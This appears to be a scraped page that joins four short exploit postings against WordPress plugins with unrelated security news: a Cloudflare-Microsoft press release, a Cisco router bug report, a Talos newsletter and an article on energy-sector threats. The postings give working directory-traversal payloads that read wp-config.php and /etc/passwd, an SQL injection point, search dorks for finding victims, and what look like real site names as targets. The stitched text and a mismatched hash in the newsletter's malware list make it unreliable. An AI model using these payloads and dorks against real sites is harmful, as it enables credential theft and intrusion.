WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.3 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 83b023ff748b63a814933d6674398e32e4fb2ba5c520cc7997e01b2a23da875c

Download | Favorite | View

**WordPress Slider Revolution 4.1.3 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.3 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/sse.sg/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.3 Directory Traversal

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Profile Builder 3.0.5 SQL Injection

**SAN FRANCISCO -- (****BUSINESS WIRE****) --** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, today announced an expansion of its relationship with Microsoft to help customers easily deploy, automate, and enhance their organization’s Zero Trust security.

Working from anywhere is more common than ever, and critical applications have moved to the cloud—no longer residing inside an office protected by a secure perimeter. This fundamental shift in where and how people work has caused enterprises to rethink legacy tools and abandon the traditional castle-and-moat approach to security, looking towards Zero Trust instead. As CIOs continue to navigate this paradigm shift, Cloudflare has developed a new set of integrations with Microsoft to help organizations on this journey. Now, mutual customers can seamlessly deploy Zero Trust security tools in minutes, with no complex code changes, and add industry-first features, such as Cloudflare’s Remote Browser Isolation technology.

"When I speak with CIOs, I continue to hear that their number one concern remains security, closely followed by adapting to the new hybrid world,” said Matthew Prince, CEO and co-founder at Cloudflare. “We want to make it easier than ever for IT leaders to deploy Zero Trust security across the enterprise and keep users safe wherever they are working from. I’m thrilled that we are deepening our integration with Microsoft so we can help our joint customers easily deploy Zero Trust security across some of the most used applications in the workplace.”

Through these new integrations, Cloudflare now provides a comprehensive identity driven approach to protect applications, users, devices and networks from attacks. These integrations pair Microsoft Identity solutions and Cloudflare network security tools to create a quality Zero Trust offering.

“A cloud-native Zero Trust security model has become an absolute necessity as enterprises continue to adopt a cloud-first strategy,” said Joy Chik, President, Identity and Network Access, Microsoft. “Cloudflare has developed robust product integrations with Microsoft to help security and IT leaders prevent attacks proactively, dynamically control policy and risk, and increase automation in alignment with Zero Trust best practices.”

Cloudflare and Microsoft Azure Active Directory (Azure AD) customers can now:

*   **Deploy Zero Trust Security without changing one line of code:** Now joint customers can choose to define specific rules in either Azure AD or in Cloudflare Access i.e. which users can access specific applications based on various factors such as user risk level, device platform, location, etc. and enforce across both products without changing a line of code.
*   **Isolate high-risk users automatically with industry leading browser isolation technology:** By integrating Cloudflare’s Remote Browser Isolation with Azure AD, high-risk users, such as temporary employees, are contained proactively in a remote browser session for added security.
*   **Save IT teams hundreds of hours of manual work:** Cloudflare Access will use the System for Cross-Domain Identity Management (SCIM) to directly integrate with Azure AD. Groups are automatically synced across Cloudflare and Azure Active Directory platforms and groups, saving hundreds of hours of manual work from IT teams.
*   **Keep sensitive Government data off of the public Internet:** By connecting Azure Government Cloud to Cloudflare’s global network via the Secure Hybrid Access (SHA) program, Government customers (‘GCC’) will be able to keep sensitive traffic secure by staying off of the public Internet. Additionally, Government customers (‘GCC’) will be able to define and enforce granular rules defining who can access what using the joint solution from the dashboard without any code changes.

Cloudflare has worked with Microsoft since 2018 to provide mutual customers with an improved Internet experience by securing web applications and safeguarding employees with identity and device protections. Cloudflare’s deep integrations across Microsoft 365 and Azure have supported many of the largest Fortune 500 companies on their Zero Trust journey, enabling customers to simply and easily support their security and performance needs. Most recently, Microsoft named Cloudflare the winner of its Security Software Innovator of the Year award.

To learn more about Cloudflare’s integration with Microsoft, check out the resources below:

*   Blog: Expanding our collaboration with Microsoft: proactive and automated Zero Trust security for customers
*   Joint reference architecture
*   Joint Zero Trust Webinar
*   Microsoft landing page
*   Docs: Enable SCIM on the Zero Trust dashboard
*   Docs: Use multiple Azure AD Conditional Access Policies with Access
*   Docs: Isolate Azure AD risky users

**About Cloudflare**

Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements**

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding Cloudflare’s partnership with Microsoft and the potential resulting benefits to Cloudflare customers, the potential benefits to customers of integrating Cloudflare and Microsoft products, the potential opportunity for Cloudflare to attract additional customers and to expand sales to existing customers through Cloudflare’s product integrations with Microsoft, the expected functionality and performance of Cloudflare’s Zero Trust and other products and technology, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in Cloudflare’s filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that Cloudflare may make from time to time with the SEC.

The forward-looking statements made in this press release relate only to events as of the date on which the statements are made. Cloudflare undertakes no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. Cloudflare may not actually achieve the plans, intentions, or expectations disclosed in Cloudflare’s forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Expands Relationship With Microsoft

Unpatched Cisco bugs, tracked as CVE-2023-20025 and CVE-2023-20026, allow lateral movement, data theft, and malware infestations.

Two security vulnerabilities in Cisco routers for small and midsize businesses (SMBs) could allow unauthenticated cyberattackers to take full control of a target device to run commands with root privileges. Unfortunately, they'll remain unpatched even though proof-of-concept exploits are floating around in the wild.

Among other things, a successful compromise could allow cyberattackers to eavesdrop on or hijack VPN and session traffic flowing through the device, gain a foothold for lateral movement within a company's network, or run cryptominers, botnet clients, or other malware.

"It’s an attractive target from a technical point of view. As an attacker, if you manage to get remote code execution on core routing or network infrastructure, your ability to move laterally increases exponentially," noted Casey Ellis, founder and CTO at Bugcrowd, in an emailed comment.

**Critical-Rated Bug Offers Root Privileges**

The first bug is a critical-rated authentication bypass issue (CVE-2023-20025) that exists in the Web management interface of the devices and carries a rating of 9 out of 10 on the CVSS vulnerability-severity scale.

Meanwhile, the second flaw — tracked as CVE-2023-20026 — can allow remote code execution (RCE) with a caveat: an attacker would need to have valid administrative credentials on the affected device to be successful, so the bug is rated medium, with a 6.5 CVSS score.

They both affect all versions of the RV016, RV042, RV042G, and RV082 routers, which have reached end of life (EoL). As such, the appliances therefore no longer receive security updates, according to the networking giant's Jan. 11 advisory.

The advisory noted that both bugs are "due to improper validation of user input within incoming HTTP packets," so an attacker needs only to send a crafted HTTP request to the Web-based management interface to gain root access on the underlying operating system.

Cisco "is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory," it said, though in-the-wild attacks have so far not been spotted.

While there are no workarounds that address the bugs, a possible mitigation would be to disable remote management of the routers and block access to ports 443 and 60443, according to Cisco, meaning the routers would only be accessible through the LAN interface.

"It’s always a best practice not to allow remote administration of network devices accessible from the open internet, however, small business using some MSP/MSSPs have to leave it open for their service providers," John Bambenek, principal threat Hunter at Netenrich, noted via email. "That said, this is the worst of all worlds with PoC code publicly available and no ... patches available."

Replacing the devices is the best course of action to fully protect one's business, the researchers noted.

**Big Impact, Even at EoL**

Researchers noted that the routers' existing installed base is significant, even though the devices have been discontinued. It's not uncommon for out-of-date gear to linger on in business environments well after it's been cut off — offering a rich playground for cyberattackers.

"The Cisco small business routers affected by these vulnerabilities still see reasonably widespread usage, though they are all officially end of life," Mike Parkin, senior technical engineer at Vulcan Cyber, said via email. "The challenge will be that these devices are typically found in small businesses with limited resources or used by individuals who may not have the budget to replace them."

And, it's not just SMBs who are affected, Bugcrowd's Ellis noted: "SMB routers are very widely deployed, and in a post-COVID hybrid/work from home world, it’s not just an SMB problem. Branch offices, COEs, and even home offices are potential users of the vulnerable product."

Critical Cisco SMB Router Flaw Allows Authentication Bypass, PoC Available

We tried to get ChatGPT to write this week’s newsletter but it was at capacity, so you’ll have to stick with us for another week. Or maybe that’s just what the robots want you to think, you be the judge

Thursday, January 12, 2023 14:01

Welcome to this week’s edition of the Threat Source newsletter.

We tried to get ChatGPT to write this week’s newsletter but it was at capacity, so you’ll have to stick with us for another week. Or maybe that’s just what the robots want you to think, you be the judge.

**The one big thing**

This week Talos hosted a 2022 Year in Review: APTs livestream. On the livestream we brought together subject matter experts to deep dive into the Advanced Persistent Threats section of our 2022 Year in Review. During the livestream the panel covered section findings but also gave further insights to the trends we saw over the 2022 year.

**Why do I care?**

Over the next few weeks we’ll continue to host livestreams with our SMEs and report contributors to give further insights into our report and its findings. If you’re not one for larger reports or extended reading, our Topic Summary reports provide a one-pager to quickly digest the information of corresponding sections. Read the newly released APT Topic Summary Report here.

**So now what?**

Join us for our final two livestreams, on LinkedIn and Twitter, on January 24th and February 7th as we continue to discuss the general threat landscape and conclude our report coverage with a panel discussion on ransomware and commodity loaders.

**Top security headlines of the week**

Microsoft released its monthly security update on Tuesday, disclosing 98 vulnerabilities. Of these vulnerabilities, 11 are classified as “Critical”, 87 are classified as “Important”, no vulnerabilities were classified as “Moderate.” (DarkReading) See Talos’ Patch Tuesday coverage for Snort rules and prominent vulnerabilities.

We’re only the second week into 2023 and ransomware isn’t taking any breaks this year. Maternal & Family Health Services, a Pennsylvania based nonprofit health provider, confirmed the ransomware attack had exposed almost half a billion individuals’ personal data. Impacted were current and former patients along with employees and vendors.  (TechCrunch)

Suffering from a previous breach earlier this month CircleCI is in the news yet again as researchers warn the breach may have an impact on other third-party applications. Given CircleCI integration with SaaS and Cloud providers and it’s authentication process researchers urge users to rotate all secrets stored in CircleCI and hunt for malicious behavior on SaaS and cloud platforms. (SC Media)

**Can’t get enough Talos?**

APT Topic Summary Report

2022 Year in Review: APTs Livestream Replay

2022 Year in Review Report

Beers with Talos

Talos Takes

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)

Mesa, AZ  

Cisco Live Amsterdam (Feb 6-10)

Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d

MD5:  26f927fb7560c11e509f0b8a7e787f79

Typical Filename: Iris QuickLinks.exe

Claimed Product: Iris QuickLinks

Detection Name: W32.DFC.MalParent

SHA 256:   9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5:  2915b3f8b703eb744fc54c81f4a9c67f

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Simple\_Custom\_Detection

SHA 256:   d5dc790f6f220cf7e42c6c1c9f5bc6e4443cb52d07bcdef24a6bf457153c1d86

MD5:  69fbf6849d935432bac8b04bdb00fd68

Typical Filename: kmsauto++.exe

Claimed Product: N/A

Detection Name: W32.File.MalParent

SHA 256:  e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934

MD5:  93fefc3e88ffb78abb36365fa5cf857c

Typical Filename: Wextract

Claimed Product: Internet Explorer

Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:   d00977521dba67111876729e4b8ed09455b85c653bef2fd0c23e9e8a09f0a9b6

MD5:  d00977521dba67111876729e4b8ed09455b85c653bef2fd0c23e9e8a09f0a9b6

Typical Filename: KMSAuto x64 dv.exe

Claimed Product: N/A

Detection Name: W32.File.MalParent

Threat Source newsletter (Jan. 12, 2023): Did ChatGPT write our newsletter?

Energy has become the new battleground for both physical and cyber security warfare, driven by nation-state actors, increasing financial rewards for ransomware gangs and decentralized devices. Chris Price reports.

The physical threat to the world's critical national infrastructure (CNI) has never been greater. At least 50 meters of the Nord Stream 1 and 2 underground pipelines that once transported Russian gas to Germany were destroyed in an attack in late September 2022, though it remains unclear who is to blame.

More recently, Russia has also shifted its war in Ukraine to targeting energy infrastructure with its own missiles and Iran-supplied Shahed-136 drones. According to a tweet from Ukraine's President Volodymyr Zelensky on Oct. 18, "30% of Ukraine's power stations have been destroyed, causing massive blackouts across the country," while on Nov. 1 during a meeting with the European Commissioner for Energy, Kadri Simson, Zelensky said that between "30% and 40% of \[the country's\] energy systems had been destroyed."

**Growing Cybersecurity Threat**

However, physical security threats resulting from the war in Ukraine and increasing tensions between East and West aren't the only serious threats to our CNI. There is a growing cybersecurity threat too. On May 7, 2021, the Colonial Pipeline that originates in Houston, Texas, and that carries gasoline and jet fuel to the southeastern US was forced to halt all of its operations to contain a ransomware attack.

In this attack, hackers gained entry through a VPN (virtual private network) account that allowed employees to access the company's systems remotely using a single username and password found on the Dark Web. Colonial paid the hackers, who were an affiliate of a Russia-linked cybercrime group Darkside, a $4.4 million ransom shortly after the attack.

Less than a year later, Sandworm, a threat group allegedly operated by the Russian cybermilitary unit of the GRU, attempted to prevent an unnamed Ukrainian power provider from functioning. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, \[and\] active network equipment," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement.

Slovak cybersecurity firm ESET, which collaborated with Ukrainian authorities to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware.

"The Sandworm attackers made an attempt to deploy the Industroyer2 malware against high-voltage electrical substations in Ukraine," ESET explained. The victim's power grid network was understood to have been penetrated in two waves, the initial compromise coinciding with the Russian invasion of Ukraine in February 2022 and a follow-up infiltration in April allowing the attackers to upload Industroyer2.

**Digitized Environments**

According to John Vestberg, CEO of Clavister, a Swedish company specializing in network security software, "it is now beyond doubt that cybercriminals pose an ever-increasing threat to critical national infrastructure." He adds: "CNI, such as oil and gas, is a prime target for ransomware gangs." He believes energy firms and their suppliers need to take a more proactive, rather than reactive, approach to cybersecurity using predictive analytics and tools like AI (artificial intelligence) and ML (machine learning) technologies.

Camellia Chan, CEO and founder of Flexxon brand X-PHY, agrees: "It's crucial that CNI organizations never take their eyes off the ball," she says. "Good cybersecurity is an ongoing, proactive, intelligent, and self-learning process and embracing emerging tech such as AI as part of a multilayered cybersecurity solution is essential to detect every type of attack and help create a more robust cybersecurity framework."

Nor are the well-organized, often state-sponsored, ransomware gangs the only problem CNI organizations face. Part of the issue is that as industrial organizations (including utilities such as water and energy companies) digitize their environments, they are exposing potential security weaknesses and vulnerabilities to threat actors much more than in the past.

**Integrated IT/OT Networks**

Whereas traditionally security was not viewed as being of critical importance because an organization's OT (operational technology) network was designed to be isolated, and also because it ran proprietary industrial protocols and custom software, this is no longer the case.

As Daniel Trivellato, VP of OT product engineering at Forescout, a cybersecurity automation software company, says: “OT environments have modernized and are no longer air-gapped from IT networks, meaning that they are more exposed and their lack of security measures poses a critical risk." In connecting these two environments, organizations are increasing the threat landscape but not necessarily putting in appropriate measures to mitigate the risk.

According to Trivellato, this hasn't gone "unnoticed by threat actors" with ICS- and OT-specific malware such as Industroyer, Triton, and Incontroller evidence of the increasingly sophisticated capabilities that attackers have begun to deploy in attacking, resulting in many serious incidents. "While most OT devices can't be patched out, there are practices to address the weaknesses such as device visibility and asset management, segmentation, and continuous monitoring of traffic," Trivellato adds.

**Grid Edge Risk**

For Trevor Dearing, director of critical infrastructure solutions at zero-trust segmentation company Illumio, part of the attraction to cybercriminals of attacking energy companies is the potentially high rewards on offer. "Many of the gangs are realizing that if they can prevent the service from being delivered to customers then companies are more likely to pay the ransom than if they are just stealing data," he says.

A further problem, he says, is that energy systems no longer just comprise the traditional grid including power stations and power lines. Instead, what's emerging is what's known as the "grid edge" — decentralized devices such as smart meters as well as solar panels and batteries in people's homes and businesses. Utah-based company sPower, which owns and operates over 150 generators in the US, was believed to be the first renewable energy provider to be hit by a cybersecurity attack in March 2019 when threat actors exploited a known flaw in Cisco firewalls to disrupt communications over a span of about 12 hours.

One way that renewable energy systems are particularly vulnerable to attack is through their inverters. Providing the interface between solar panels and the grid, these are used to convert the DC (direct current) energy generated by the PV (photovoltaic) solar panel into AC (alternating current) electricity provided to the mains. If the inverter's software isn't updated and secure, its data could be intercepted and manipulated in much the same way as previous attacks in Ukraine and the US. Furthermore, an attacker could also embed code in an inverter that could spread malware into the larger power system, creating even more damage.

According to Ali Mehrizi-Sani, associate professor at Virginia Polytechnic Institute and State University and co-author of a 2018 paper assessing the cybersecurity risk of solar PV, hackers can artificially create a malfunction in a PV system to launch cyberattacks to the inverter controls and monitoring system.

